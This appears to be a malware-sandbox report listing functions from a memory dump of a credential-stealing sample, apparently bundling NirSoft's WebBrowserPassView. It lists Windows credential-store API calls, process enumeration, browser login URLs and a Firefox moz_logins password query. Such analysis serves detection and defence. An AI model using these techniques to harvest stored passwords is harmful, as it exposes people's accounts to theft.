                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                  • API String ID: 3037099051-517860148
                                                                                                                                                                  • Opcode ID: 2fcdf58697040aa4c7eb54e95d53208f650488f18f63fe222914c72976027cdc
                                                                                                                                                                  • Instruction ID: d02a95b1ac945ad733c6c475c60bd1556454897fd3a1253caa6bc47d13ece21f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2fcdf58697040aa4c7eb54e95d53208f650488f18f63fe222914c72976027cdc
                                                                                                                                                                  • Instruction Fuzzy Hash: AD21A9B294021876EB20BB529C46FCB7B6CDF55754F00047BF50871192DBBC9A94C6EE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403C2A, Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                  • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                                                                                                                                                  • API String ID: 2238633743-1621422469
                                                                                                                                                                  • Opcode ID: 75ed6b8b2212405dc2e3096810b13c68b16b60bade9346944bfe3eeaaf52b7e4
                                                                                                                                                                  • Instruction ID: d7a6577b60cfc464e8e16958ee64dd601e1a2e2a5708563609cb1b578f097ad1
                                                                                                                                                                  • Opcode Fuzzy Hash: 75ed6b8b2212405dc2e3096810b13c68b16b60bade9346944bfe3eeaaf52b7e4
                                                                                                                                                                  • Instruction Fuzzy Hash: A2F0F974940B44AFEF306F769D49E06BEF0EFA87017214D2EE0C1A3651D7B99100CE48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407737, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00407C89,?,?,?,0000001E), ref: 00407760
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00407774
                                                                                                                                                                    • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                  • memset.MSVCRT ref: 004077A6
                                                                                                                                                                  • memset.MSVCRT ref: 004077C8
                                                                                                                                                                  • memset.MSVCRT ref: 004077DD
                                                                                                                                                                  • strcmp.MSVCRT ref: 0040781C
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078B2
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?), ref: 004078D1
                                                                                                                                                                  • memset.MSVCRT ref: 004078E5
                                                                                                                                                                  • strcmp.MSVCRT ref: 00407949
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040797B
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00407C89,?,?,?,0000001E), ref: 00407984
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$File$strcmpstrcpy$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                  • String ID: ---
                                                                                                                                                                  • API String ID: 3751793120-2854292027
                                                                                                                                                                  • Opcode ID: 2a857cbeb5ab5e1bd89b1bc0351e99f96f5a4f3ec23066d0f11bd49c9005f69b
                                                                                                                                                                  • Instruction ID: 5eab4b77d8efc932d29ad1d752f1a4839dd8d7bf75d011c8978729a0abaaed7e
                                                                                                                                                                  • Opcode Fuzzy Hash: 2a857cbeb5ab5e1bd89b1bc0351e99f96f5a4f3ec23066d0f11bd49c9005f69b
                                                                                                                                                                  • Instruction Fuzzy Hash: 856159B2C0416D9ADF20EB948C859DEBB7C9B15314F1041FBE518B3141DA385FC4CBA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00412F99, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(psapi.dll,?,00411582), ref: 00412FAC
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412FC5
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412FD6
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00412FE7
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00412FF8
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413009
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413029
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                  • API String ID: 2449869053-70141382
                                                                                                                                                                  • Opcode ID: cfd5c71916fbce4a342b80b0f76a79ff8ef3fa3daac0bce444ef2cea232ec273
                                                                                                                                                                  • Instruction ID: 777907c91c3138f07d32b7effc6a6e277a0cb3bdfe1d402d2202e46302417196
                                                                                                                                                                  • Opcode Fuzzy Hash: cfd5c71916fbce4a342b80b0f76a79ff8ef3fa3daac0bce444ef2cea232ec273
                                                                                                                                                                  • Instruction Fuzzy Hash: B5014030940715AAD7318F256E44B6A2EE4E759B83B14002BA404D2A5AEBB8D941DBAC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040FDE0, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmp
                                                                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                  • API String ID: 2081463915-1959339147
                                                                                                                                                                  • Opcode ID: d68f99de9f7ef6dc0a98dc4c4bcb6a836855c619b54ed7beb0ba6369b4841934
                                                                                                                                                                  • Instruction ID: 6ae1867121f1a9de607d4cf96a2848453b881622ab493d5bc2878352e6736150
                                                                                                                                                                  • Opcode Fuzzy Hash: d68f99de9f7ef6dc0a98dc4c4bcb6a836855c619b54ed7beb0ba6369b4841934
                                                                                                                                                                  • Instruction Fuzzy Hash: 4D01EC6328A32164F97469A7AC07F8B0A49CBD2F7AF71543BF904D41C6FF8D944560AC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00412F15, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00411589), ref: 00412F24
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00412F3D
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00412F4E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00412F5F
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00412F70
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00412F81
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                                                                  • Opcode ID: 9afc599291b44c0031a1a238e792fad3046f96ec859f9be66ee04854d14c5414
                                                                                                                                                                  • Instruction ID: 90193f1111e05c4afbc6439255eabbfb584b4719c6c3eda45dffcf0f008ca331
                                                                                                                                                                  • Opcode Fuzzy Hash: 9afc599291b44c0031a1a238e792fad3046f96ec859f9be66ee04854d14c5414
                                                                                                                                                                  • Instruction Fuzzy Hash: 6BF08B30941321AEAB208F295F40F6729B4E745BCAF140037B404D1655DBE8C453DF7D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403B29, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00403BA4: FreeLibrary.KERNEL32(?,00403B31,00000000,00409589,?,00000000,?), ref: 00403BAB
                                                                                                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                  • API String ID: 2449869053-4258758744
                                                                                                                                                                  • Opcode ID: b35c21cb85061f263d9bcfade7dbfc97ff2743854c4f3c632f847b452f6a88c2
                                                                                                                                                                  • Instruction ID: 8f7743962e36341c748a679f4d1b70e48ab6ec882cd35c5a4d1c5c737e04e9f5
                                                                                                                                                                  • Opcode Fuzzy Hash: b35c21cb85061f263d9bcfade7dbfc97ff2743854c4f3c632f847b452f6a88c2
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F011A34500B419BDB31AF768809E0ABBF4EF94709B20882FE091A3692D6BDB140CF48
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F99D, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 166windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040FA22
                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040FA30
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0040FA45
                                                                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040FA79
                                                                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 0040FA85
                                                                                                                                                                    • Part of subcall function 0040F7F1: GetCursorPos.USER32(?), ref: 0040F7FB
                                                                                                                                                                    • Part of subcall function 0040F7F1: GetSubMenu.USER32(?,00000000), ref: 0040F809
                                                                                                                                                                    • Part of subcall function 0040F7F1: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040F83A
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040FAA0
                                                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 0040FAA9
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040FAB0
                                                                                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040FAF4
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040FB3D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cursor$MenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
                                                                                                                                                                  • String ID: WebBrowserPassView
                                                                                                                                                                  • API String ID: 3991541706-2171583229
                                                                                                                                                                  • Opcode ID: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
                                                                                                                                                                  • Instruction ID: d9273dffa9cc4a7b5f3d28471e210e7f23542924c6da0ead56af32090a150d55
                                                                                                                                                                  • Opcode Fuzzy Hash: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
                                                                                                                                                                  • Instruction Fuzzy Hash: 3C51F431600105ABDB34AF64C895B6A77B6BF48310F104137F909AB6E1DB78EC55CF89
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E9E8, Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 552707033-0
                                                                                                                                                                  • Opcode ID: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
                                                                                                                                                                  • Instruction ID: dc3f1f52df5294a2ec978d0ae6c3ccd5c38b38754740f987f7490d1c54cf7de8
                                                                                                                                                                  • Opcode Fuzzy Hash: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
                                                                                                                                                                  • Instruction Fuzzy Hash: 9141B275A00609BFEF11DFA8CD89FEEBBBAFB48304F100465E615A61A0C7716A50DB14
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A230, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040A401,?,?,*.*,0040A46B,00000000), ref: 0040A250
                                                                                                                                                                    • Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040A280
                                                                                                                                                                    • Part of subcall function 0040A19F: _memicmp.MSVCRT ref: 0040A1B9
                                                                                                                                                                    • Part of subcall function 0040A19F: memcpy.MSVCRT ref: 0040A1D0
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040A2C7
                                                                                                                                                                  • strchr.MSVCRT ref: 0040A2EC
                                                                                                                                                                  • strchr.MSVCRT ref: 0040A2FD
                                                                                                                                                                  • _strlwr.MSVCRT ref: 0040A30B
                                                                                                                                                                  • memset.MSVCRT ref: 0040A326
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A373
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                  • String ID: 4$h
                                                                                                                                                                  • API String ID: 4066021378-1856150674
                                                                                                                                                                  • Opcode ID: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
                                                                                                                                                                  • Instruction ID: 17f5db22f20d9ae327a0934dc0a50b98bc11baf633b6527cb3b89d44c7cb3914
                                                                                                                                                                  • Opcode Fuzzy Hash: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D31A271900218BFEB11EBA4CC85FEE77ACEB45354F10406AFA08E6181E7399F558B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413F4B, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                  • String ID: %%0.%df
                                                                                                                                                                  • API String ID: 3473751417-763548558
                                                                                                                                                                  • Opcode ID: 006428a89fa05684acf2644298e63651eb7cb4553425473b44fafabdd736af6e
                                                                                                                                                                  • Instruction ID: 0b838db9f825932711660ea6569b586705b9a26b63b1a47a63d1f68ae8ff407c
                                                                                                                                                                  • Opcode Fuzzy Hash: 006428a89fa05684acf2644298e63651eb7cb4553425473b44fafabdd736af6e
                                                                                                                                                                  • Instruction Fuzzy Hash: 86313271900129BBEB20DF55CC85FEB7B7CEF89304F0100EAF509A2112EB789A54CB69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004055D0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetTimer.USER32 ref: 004055F3
                                                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 00405603
                                                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 00405614
                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405637
                                                                                                                                                                  • GetParent.USER32(?), ref: 00405662
                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00405669
                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00405677
                                                                                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 004056C7
                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004056D3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                  • String ID: A
                                                                                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                                                                                  • Opcode ID: a5eb5b96462c3251e9a860f7e43a9a09c1a522a6715d8b372432c44450ed2e81
                                                                                                                                                                  • Instruction ID: 7dfccb24d1e076f690be31caf06a6d4f547633615caf0f8568b2f3749d1e3a55
                                                                                                                                                                  • Opcode Fuzzy Hash: a5eb5b96462c3251e9a860f7e43a9a09c1a522a6715d8b372432c44450ed2e81
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D317E75640B04BBEB201F659C85F6B7B6AFB44741F50883AF30A7A1E1C7F698908E58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E29C, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 0040E2AC
                                                                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 0040E378
                                                                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040E319
                                                                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 0040E33C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                                                                                  • Opcode ID: c4fce1170840367a350b3e6d5f67ab6abb67d71c967fae5ab0e812931b85aba3
                                                                                                                                                                  • Instruction ID: dd7614801a102cad1738161c6781c4b5767366b5b9f47406b9b80e8d834f6cb8
                                                                                                                                                                  • Opcode Fuzzy Hash: c4fce1170840367a350b3e6d5f67ab6abb67d71c967fae5ab0e812931b85aba3
                                                                                                                                                                  • Instruction Fuzzy Hash: C82154B69002186BDB21EBA5CC45F9A77BCEF4D785F0440AAF50893151DB38DB848B59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413031, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • wcschr.MSVCRT ref: 0041304A
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041305A
                                                                                                                                                                    • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
                                                                                                                                                                    • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
                                                                                                                                                                    • Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3
                                                                                                                                                                  • wcscpy.MSVCRT ref: 004130A9
                                                                                                                                                                  • wcscat.MSVCRT ref: 004130B4
                                                                                                                                                                  • memset.MSVCRT ref: 00413090
                                                                                                                                                                    • Part of subcall function 00408463: GetWindowsDirectoryW.KERNEL32(00453718,00000104,?,004130E9,?,?,00000000,00000208,-00000028), ref: 00408479
                                                                                                                                                                    • Part of subcall function 00408463: wcscpy.MSVCRT ref: 00408489
                                                                                                                                                                  • memset.MSVCRT ref: 004130D8
                                                                                                                                                                  • memcpy.MSVCRT ref: 004130F3
                                                                                                                                                                  • wcscat.MSVCRT ref: 004130FF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                  • String ID: \systemroot
                                                                                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                                                                                  • Opcode ID: f2ab5198b6a2690fa1a836c34b2ef13a361ad9faede40cdf7fdb84fd41dd5d52
                                                                                                                                                                  • Instruction ID: 36f3f6f0360cce9f0c7183545ae4e1e5b3fba08c84210a6b9e93ac32fafd8b1c
                                                                                                                                                                  • Opcode Fuzzy Hash: f2ab5198b6a2690fa1a836c34b2ef13a361ad9faede40cdf7fdb84fd41dd5d52
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A21D7B640530469E721EBB19C86FEB63EC9F46715F20415FB115A2082FB7CAA84475E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040744D, Relevance: 16.8, APIs: 10, Strings: 1, Instructions: 251stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00443A61: memset.MSVCRT ref: 00443A8C
                                                                                                                                                                    • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AA3
                                                                                                                                                                    • Part of subcall function 00443A61: memset.MSVCRT ref: 00443AD6
                                                                                                                                                                    • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AEC
                                                                                                                                                                    • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443AFD
                                                                                                                                                                    • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B23
                                                                                                                                                                    • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B34
                                                                                                                                                                    • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B5B
                                                                                                                                                                    • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B6C
                                                                                                                                                                    • Part of subcall function 00443A61: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
                                                                                                                                                                    • Part of subcall function 00443A61: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
                                                                                                                                                                    • Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
                                                                                                                                                                    • Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB
                                                                                                                                                                  • memset.MSVCRT ref: 0040748C
                                                                                                                                                                    • Part of subcall function 00408C5E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,00402A35,?,?), ref: 00408C77
                                                                                                                                                                  • memset.MSVCRT ref: 0040750B
                                                                                                                                                                  • memset.MSVCRT ref: 00407520
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040765C
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407672
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407688
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040769E
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076B4
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076CA
                                                                                                                                                                  • memset.MSVCRT ref: 004076E0
                                                                                                                                                                  Strings
                                                                                                                                                                  • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins, xrefs: 004074D2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
